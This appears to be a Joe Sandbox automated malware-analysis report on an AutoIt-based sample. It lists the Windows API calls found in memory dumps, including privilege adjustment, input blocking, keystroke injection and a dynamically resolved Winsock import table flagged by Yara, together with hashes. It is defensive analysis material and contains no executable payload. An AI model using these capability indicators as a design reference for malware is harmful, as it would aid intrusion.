                                      • Instruction Fuzzy Hash: 2DD12A3891125E9BCB15FBA1DC94ADDB3B9EF44300F5285E9D408EB220DB70AE969F50
                                      APIs
                                      • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00872AAD
                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00872AE4
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Internet$AvailableDataFileQueryRead
                                      • String ID:
                                      • API String ID: 599397726-0
                                      • Opcode ID: 6786fed80c1e3c631f56705c9bf7580b6097461e3b12ceada6e72e6fcd270ed4
                                      • Instruction ID: 6d9a5159dbd31b017f3f12d6e6a662e0f498de539f47aa4932833f3ea949b5bb
                                      • Opcode Fuzzy Hash: 6786fed80c1e3c631f56705c9bf7580b6097461e3b12ceada6e72e6fcd270ed4
                                      • Instruction Fuzzy Hash: 9341E871504319FFEB20DE54DC85EBBB7ACFB40724F10805AF609E6149E671EE819A60
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0086B986
                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0086B9E0
                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0086BA2D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DiskFreeSpace
                                      • String ID:
                                      • API String ID: 1682464887-0
                                      • Opcode ID: 6cf56572e51ee0ed69c7cea4ad04fac54c0df958dd185c08a1d14c031464840f
                                      • Instruction ID: 83be0312a0eee4f936063bcd42480ed4a9bf40e09966abec6dd477fd72ab5793
                                      • Opcode Fuzzy Hash: 6cf56572e51ee0ed69c7cea4ad04fac54c0df958dd185c08a1d14c031464840f
                                      • Instruction Fuzzy Hash: 63218E75A00118EFCB00EFA9DC85AADFBB8FF48311F1480AAE905E7251DB319955CB51
                                      APIs
                                        • Part of subcall function 00820FE6: std::exception::exception.LIBCMT ref: 0082101C
                                        • Part of subcall function 00820FE6: __CxxThrowException@8.LIBCMT ref: 00821031
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008593E3
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00859410
                                      • GetLastError.KERNEL32 ref: 0085941D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                      • String ID:
                                      • API String ID: 1922334811-0
                                      • Opcode ID: fc48b2577e834738e38435cd0538269ea6c394ec14be5cacb35683f04c058a41
                                      • Instruction ID: 6dbb3cc868521ea6014f71fd6fc89cc1200b3ed0d57963b408a70072b8b9258a
                                      • Opcode Fuzzy Hash: fc48b2577e834738e38435cd0538269ea6c394ec14be5cacb35683f04c058a41
                                      • Instruction Fuzzy Hash: 0811C1B1414208EFD728EF64EC85D2BB7BCFB44311B24812EF48987281EB30AC41CB60
                                      APIs
                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 008642FF
                                      • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 0086433C
                                      • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00864345
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CloseControlCreateDeviceFileHandle
                                      • String ID:
                                      • API String ID: 33631002-0
                                      • Opcode ID: 3dccfd9eb49705b1ee9032df9a1ca310be9f3f92c35b3bbd22790e6e59b1d905
                                      • Instruction ID: 9887641383940eaa7cef38f710083149b80f836c6f14133cbb46eb1d9cbc2682
                                      • Opcode Fuzzy Hash: 3dccfd9eb49705b1ee9032df9a1ca310be9f3f92c35b3bbd22790e6e59b1d905
                                      • Instruction Fuzzy Hash: 0F11A5B2D00229BFE7109BE8DC44FAFBBBCFB09710F150256B914E7290C2745D008BA5
                                      APIs
                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00864F45
                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00864F5C
                                      • FreeSid.ADVAPI32(?), ref: 00864F6C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                      • String ID:
                                      • API String ID: 3429775523-0
                                      • Opcode ID: fb5572185a92ce0e5e13778051d780deb1cb10694e7010b5dac3830d57689b09
                                      • Instruction ID: 736007d71f45527820e39141ec6465c71637f9deb7742702b1a9138f4d04ba64
                                      • Opcode Fuzzy Hash: fb5572185a92ce0e5e13778051d780deb1cb10694e7010b5dac3830d57689b09
                                      • Instruction Fuzzy Hash: 43F04975A1130CBFDF00DFE0DC89AAEBBBCFF08201F1044A9AA01E2180E7346A048B50
                                      APIs
                                      • GetFileAttributesW.KERNEL32(?,0084FC86), ref: 0086495A
                                      • FindFirstFileW.KERNEL32(?,?), ref: 0086496B
                                      • FindClose.KERNEL32(00000000), ref: 0086497B
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: FileFind$AttributesCloseFirst
                                      • String ID:
                                      • API String ID: 48322524-0
                                      • Opcode ID: 7f03c40342ed8c50702de1cedcca834bed4f2e5e1fd5fd0526d78f1395c01334
                                      • Instruction ID: 9854a8d74dfec033086daa7bcabb69dd209a9fb3eba0706c29ce390cb5841940
                                      • Opcode Fuzzy Hash: 7f03c40342ed8c50702de1cedcca834bed4f2e5e1fd5fd0526d78f1395c01334
                                      • Instruction Fuzzy Hash: 7BE0DF32850505AF82107738EC0D8EE7B5CFE06339F240B06FA36C21E0EB7099448A96
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 0086CD3E
                                      • FindClose.KERNEL32(00000000), ref: 0086CD6E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Find$CloseFileFirst
                                      • String ID:
                                      • API String ID: 2295610775-0
                                      • Opcode ID: 722b1fdf86d58171f3557173ffa0b17217d41f72b907fa633e1779755f22e4d7
                                      • Instruction ID: c45148df3a78412f44d8b651fc1b6f0794d6573530ef0d8c90758fc3d6019b24
                                      • Opcode Fuzzy Hash: 722b1fdf86d58171f3557173ffa0b17217d41f72b907fa633e1779755f22e4d7
                                      • Instruction Fuzzy Hash: 7E11A1716006009FD710EF29DC45A2AF7E4FF84325F14851EF9A9C7291CB30AC00CB81
                                      APIs
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00861B01
                                      • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00861B14
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: InputSendkeybd_event
                                      • String ID:
                                      • API String ID: 3536248340-0
                                      • Opcode ID: e8c0d806f6100b78748480d0e7171ac00b0ed291c2b8259f69bce8b13afc96bc
                                      • Instruction ID: ead5e9680c09be559137f435cb8d4cba2314b97983ade83693940e491f4a8b7d
                                      • Opcode Fuzzy Hash: e8c0d806f6100b78748480d0e7171ac00b0ed291c2b8259f69bce8b13afc96bc
                                      • Instruction Fuzzy Hash: 9AF0377190020DAFDB00DF94C806BBEBBB4FF04316F04804AF955A6292D3799615DF94
                                      APIs
                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00879B52,?,0089098C,?), ref: 0086A6DA
                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00879B52,?,0089098C,?), ref: 0086A6EC
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ErrorFormatLastMessage
                                      • String ID:
                                      • API String ID: 3479602957-0
                                      • Opcode ID: 00d8f626c42796ef564d1752b41808a154ae6670d6bac9981033f58ffd7013a0
                                      • Instruction ID: c4403c92372f61f25932d376b89da2159cfe2db705438fc06b443e46a3a262ee
                                      • Opcode Fuzzy Hash: 00d8f626c42796ef564d1752b41808a154ae6670d6bac9981033f58ffd7013a0
                                      • Instruction Fuzzy Hash: B0F05E3551422DABDB21AFA4DC48FEA776CFF09761F008156B908D6191D6309940CFA1
                                      APIs
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00858F27), ref: 00858DFE
                                      • CloseHandle.KERNEL32(?,?,00858F27), ref: 00858E10
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AdjustCloseHandlePrivilegesToken
                                      • String ID:
                                      • API String ID: 81990902-0
                                      • Opcode ID: 1614a19eb2d6a93524ddbaf8103185f6edd2c915d4db65eaf3aa20020a583eef
                                      • Instruction ID: 763965ecff871b820fb5358ee83ed4345237993f3856439232321c8a614f44c3
                                      • Opcode Fuzzy Hash: 1614a19eb2d6a93524ddbaf8103185f6edd2c915d4db65eaf3aa20020a583eef
                                      • Instruction Fuzzy Hash: 6DE0BF76010A10EFEB252B55FC09D7777ADFB04311724891AF499C0470DB615CD0DB50
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00828F87,?,?,?,00000001), ref: 0082A38A
                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0082A393
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: f36c841c4a5650c854c919803430a4da60d5f611427cf1db4f0dead0ccf4a204
                                      • Instruction ID: bafa3b90152da0ff90f436668224aa6236dd30776b5114c0eefc4311314e17e7
                                      • Opcode Fuzzy Hash: f36c841c4a5650c854c919803430a4da60d5f611427cf1db4f0dead0ccf4a204
                                      • Instruction Fuzzy Hash: 20B09232064208EFCA403BE1EC09B883F68FB44B62F044012F61D44260CB625450AE91
                                      APIs
                                      • BlockInput.USER32(00000001), ref: 008745F0
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: BlockInput
                                      • String ID:
                                      • API String ID: 3456056419-0
                                      • Opcode ID: acca2cb8d12f668e09d2adfb710325c1dec7f54cf48cad9bbb821a2e86bce622
                                      • Instruction ID: d4e5815c187b26812ee268104676e84ebce8977c4965b7d60af859f49c71ba39
                                      • Opcode Fuzzy Hash: acca2cb8d12f668e09d2adfb710325c1dec7f54cf48cad9bbb821a2e86bce622
                                      • Instruction Fuzzy Hash: 4EE0DF312002199FC300AF59E800A8BF7E8FF94760F00C016FC09CB350DB70E8008BA1
                                      APIs
                                      • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00865205
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: mouse_event
                                      • String ID:
                                      • API String ID: 2434400541-0
                                      • Opcode ID: 974d4e61e3cd8fec64f6f9ef0332546b714a632b7a871cf5cb34547d5a6c5929
                                      • Instruction ID: 48e3092067a7f84bebbd23e52cd191ea06e947cc9b35e6074a674b6909f34e46
                                      • Opcode Fuzzy Hash: 974d4e61e3cd8fec64f6f9ef0332546b714a632b7a871cf5cb34547d5a6c5929
                                      • Instruction Fuzzy Hash: 9CD092A5160E0A79EE5817289E1FF763688F3037C5F9A464A7142D90C2FCD46886A832
                                      APIs
                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00858FA7), ref: 00859389
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: LogonUser
                                      • String ID:
                                      • API String ID: 1244722697-0
                                      • Opcode ID: 591456a2887a0293120db5c87293efa1b23ad801bd1d34357358ffd8ac425ec2
                                      • Instruction ID: 426cbb9bfa0646ca6820c1ac978c6367ac17c829c946291d42777be37afcb71b
                                      • Opcode Fuzzy Hash: 591456a2887a0293120db5c87293efa1b23ad801bd1d34357358ffd8ac425ec2
                                      • Instruction Fuzzy Hash: F3D05E3226490EAFEF019EA4DC01EAE3B69EB04B01F408111FE15C50A0C775D835AF60
                                      APIs
                                      • GetUserNameW.ADVAPI32(?,?), ref: 00840734
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: NameUser
                                      • String ID:
                                      • API String ID: 2645101109-0
                                      • Opcode ID: aac41399fb70ef76d0e5fd05b7f7245d28ba0a388567a99d5fe301a6122cc6b3
                                      • Instruction ID: 1a63166860f6ad7427f15dc9828614c4a2b454d842eab47ded859241d98e009c
                                      • Opcode Fuzzy Hash: aac41399fb70ef76d0e5fd05b7f7245d28ba0a388567a99d5fe301a6122cc6b3
                                      • Instruction Fuzzy Hash: A4C04CF180050DDFCB05DBA0D988EEF77BCBB04308F140056A105F2100D7749B448E71
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0082A35A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: e5f573994149376ebb23d01d7d328065476e4be194f1616437d58c84a5bc4347
                                      • Instruction ID: 35474d232629ab98aa08cc020ddff79eacff9bcf9728bf1a1016db4cdc3b3b72
                                      • Opcode Fuzzy Hash: e5f573994149376ebb23d01d7d328065476e4be194f1616437d58c84a5bc4347
                                      • Instruction Fuzzy Hash: 3EA0113002020CEB8A002BA2EC08888BFACEA002A0B008022F80C002228B32A820AA80
                                      APIs
                                      • LoadLibraryA.KERNEL32(00000000,00000000,03CDC54A,?,00000000,03CDC567), ref: 03CDC1B4
                                      • GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 03CDC1CC
                                      • GetProcAddress.KERNEL32(00000000,__WSAFDIsSet), ref: 03CDC1DE
                                      • GetProcAddress.KERNEL32(00000000,closesocket), ref: 03CDC1F0
                                      • GetProcAddress.KERNEL32(00000000,ioctlsocket), ref: 03CDC202
                                      • GetProcAddress.KERNEL32(00000000,WSAGetLastError), ref: 03CDC214
                                      • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 03CDC226
                                      • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 03CDC238
                                      • GetProcAddress.KERNEL32(00000000,accept), ref: 03CDC24A
                                      • GetProcAddress.KERNEL32(00000000,bind), ref: 03CDC25C
                                      • GetProcAddress.KERNEL32(00000000,connect), ref: 03CDC26E
                                      • GetProcAddress.KERNEL32(00000000,getpeername), ref: 03CDC280
                                      • GetProcAddress.KERNEL32(00000000,getsockname), ref: 03CDC292
                                      • GetProcAddress.KERNEL32(00000000,getsockopt), ref: 03CDC2A4
                                      • GetProcAddress.KERNEL32(00000000,htonl), ref: 03CDC2B6
                                      • GetProcAddress.KERNEL32(00000000,htons), ref: 03CDC2C8
                                      • GetProcAddress.KERNEL32(00000000,inet_addr), ref: 03CDC2DA
                                      • GetProcAddress.KERNEL32(00000000,inet_ntoa), ref: 03CDC2EC
                                      • GetProcAddress.KERNEL32(00000000,listen), ref: 03CDC2FE
                                      • GetProcAddress.KERNEL32(00000000,ntohl), ref: 03CDC310
                                      • GetProcAddress.KERNEL32(00000000,ntohs), ref: 03CDC322
                                      • GetProcAddress.KERNEL32(00000000,recv), ref: 03CDC334
                                      • GetProcAddress.KERNEL32(00000000,recvfrom), ref: 03CDC346
                                      • GetProcAddress.KERNEL32(00000000,select), ref: 03CDC358
                                      • GetProcAddress.KERNEL32(00000000,send), ref: 03CDC36A
                                      • GetProcAddress.KERNEL32(00000000,sendto), ref: 03CDC37C
                                      • GetProcAddress.KERNEL32(00000000,setsockopt), ref: 03CDC38E
                                      • GetProcAddress.KERNEL32(00000000,shutdown), ref: 03CDC3A0
                                      • GetProcAddress.KERNEL32(00000000,socket), ref: 03CDC3B2
                                      • GetProcAddress.KERNEL32(00000000,gethostbyaddr), ref: 03CDC3C4
                                      • GetProcAddress.KERNEL32(00000000,gethostbyname), ref: 03CDC3D6
                                      • GetProcAddress.KERNEL32(00000000,getprotobyname), ref: 03CDC3E8
                                      • GetProcAddress.KERNEL32(00000000,getprotobynumber), ref: 03CDC3FA
                                      • GetProcAddress.KERNEL32(00000000,getservbyname), ref: 03CDC40C
                                      • GetProcAddress.KERNEL32(00000000,getservbyport), ref: 03CDC41E
                                      • GetProcAddress.KERNEL32(00000000,gethostname), ref: 03CDC430
                                      • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 03CDC442
                                      • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 03CDC454
                                      • GetProcAddress.KERNEL32(00000000,getnameinfo), ref: 03CDC466
                                      • LoadLibraryA.KERNEL32(wship6.dll,00000000,getnameinfo,00000000,freeaddrinfo,00000000,getaddrinfo,00000000,gethostname,00000000,getservbyport,00000000,getservbyname,00000000,getprotobynumber,00000000), ref: 03CDC4A4
                                      • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 03CDC4C2
                                      • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 03CDC4D7
                                      • GetProcAddress.KERNEL32(00000000,getnameinfo), ref: 03CDC4EC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: WSACleanup$WSAGetLastError$WSAIoctl$WSAStartup$__WSAFDIsSet$accept$bind$closesocket$connect$freeaddrinfo$getaddrinfo$gethostbyaddr$gethostbyname$gethostname$getnameinfo$getpeername$getprotobyname$getprotobynumber$getservbyname$getservbyport$getsockname$getsockopt$htonl$htons$inet_addr$inet_ntoa$ioctlsocket$listen$ntohl$ntohs$recv$recvfrom$select$send$sendto$setsockopt$shutdown$socket$ws2_32.dll$wship6.dll
                                      • API String ID: 2238633743-3535293950
                                      • Opcode ID: e65bc8a2561621fe4c8ac20fb4f901a36a49232fd68e3c9c3781eafbeaaa1df3
                                      • Instruction ID: 56a2aed77e8fd5d415a710e794d824ad08d2a04bd5d22948f1df990e8386a124
                                      • Opcode Fuzzy Hash: e65bc8a2561621fe4c8ac20fb4f901a36a49232fd68e3c9c3781eafbeaaa1df3
